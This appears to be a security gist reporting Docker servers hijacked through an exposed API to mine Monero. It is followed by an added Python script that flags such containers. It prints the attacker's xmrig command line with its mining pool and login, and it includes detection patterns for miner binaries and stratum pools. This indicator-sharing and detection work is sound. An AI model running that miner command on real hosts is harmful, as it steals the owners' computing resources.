Hijacked XMR Docker Servers

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR


Docker Image

All appear to be running the following image and command line (one container record from the exposed Docker API's container list, with identifiers redacted).

{
    "Status": "Up 20 hours",
    "Created": 1536506330,
    "Image": "tmpdocker/xmr",
    "Labels": {},
    "NetworkSettings": {
        "Networks": {
            "bridge": {
                "NetworkID": "REDACTED",
                "MacAddress": "REDACTED",
                "GlobalIPv6PrefixLen": 0,
                "Links": null,
                "GlobalIPv6Address": "",
                "IPv6Gateway": "",
                "DriverOpts": null,
                "IPAMConfig": null,
                "EndpointID": "REDACTED",
                "IPPrefixLen": 16,
                "IPAddress": "172.17.0.3",
                "Gateway": "172.17.0.1",
                "Aliases": null
            }
        }
    },
    "HostConfig": {
        "NetworkMode": "default"
    },
    "ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e",
    "State": "running",
    "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k",
    "Names": [
        "/clever_lovelace"
    ],
    "Mounts": [],
    "Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792",
    "Ports": []
}

Miner Pool Details

All appear to use the same protonmail email address as the miner pool login:

tmp456789@protonmail.com connecting to stratum+tcp://xmr.pool.minergate.com:45700
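The image name, `xmrig` command line and stratum pool shown above are easy to sweep for across a fleet. The script below is an added example, not part of the gist: it takes the JSON array that the Docker Engine API returns for a container list (the same record shape as above), and flags any container whose image, command, pool URL or `-u` login matches the indicators from this gist. The sample input is constructed from the gist's record plus one benign container.

```python
import json
import re

# Indicators taken from the gist above (image name, miner binary, pool host).
SUSPECT_IMAGES = {"tmpdocker/xmr"}
SUSPECT_POOL_HOSTS = {"xmr.pool.minergate.com"}
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([^:\s]+)(?::(\d+))?")
MINER_BIN_RE = re.compile(r"(?:^|[\s/])(?:xmrig|minerd|xmr-stak)\b")


def inspect_container(c):
    """Return the reasons one container record looks like a hijacked miner.

    `c` is one element of the array returned by the Docker API container list
    (the record shape shown in the gist). An empty list means nothing matched.
    """
    reasons = []
    image = c.get("Image", "")
    cmd = c.get("Command", "")
    if image in SUSPECT_IMAGES:
        reasons.append(f"known miner image {image}")
    if MINER_BIN_RE.search(cmd):
        reasons.append("miner binary in Command")
    m = STRATUM_RE.search(cmd)
    if m:
        host = m.group(1)
        tag = "known pool" if host in SUSPECT_POOL_HOSTS else "stratum pool"
        reasons.append(f"{tag} {host}")
    # An e-mail style login passed with -u is the pool account, as in the gist.
    if re.search(r"\s-u\s+\S+@\S+", cmd):
        reasons.append("e-mail style pool login in Command")
    return reasons


def find_miners(containers_json):
    """Map container Id -> reasons for every suspicious record in a container-list dump."""
    found = {}
    for c in json.loads(containers_json):
        reasons = inspect_container(c)
        if reasons:
            found[c.get("Id", "?")] = reasons
    return found


# Constructed sample: the gist's record trimmed to the relevant fields (Id shortened),
# plus one benign container that must not be flagged.
SAMPLE = json.dumps([
    {"Id": "c0c4149d6534", "Image": "tmpdocker/xmr", "State": "running",
     "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k"},
    {"Id": "deadbeef0001", "Image": "nginx:1.15", "State": "running",
     "Command": "nginx -g 'daemon off;'"},
])

if __name__ == "__main__":
    for cid, why in find_miners(SAMPLE).items():
        print(cid, "->", "; ".join(why))
```

On a real host the same function can be fed the output of `docker ps --no-trunc --format '{{json .}}'` records or the API's container list, after which the matched Ids are the containers to stop and the host is one whose Docker socket exposure needs closing.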